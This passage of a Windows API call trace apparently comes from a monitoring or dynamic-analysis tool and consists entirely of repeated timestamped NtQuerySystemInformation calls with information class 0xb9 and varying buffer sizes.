(SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0271.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0271.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0271.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0271.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0271.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0271.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0271.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0271.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0271.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0271.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0271.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0271.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0271.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd78, Length=0x50, ResultLength=0x0) 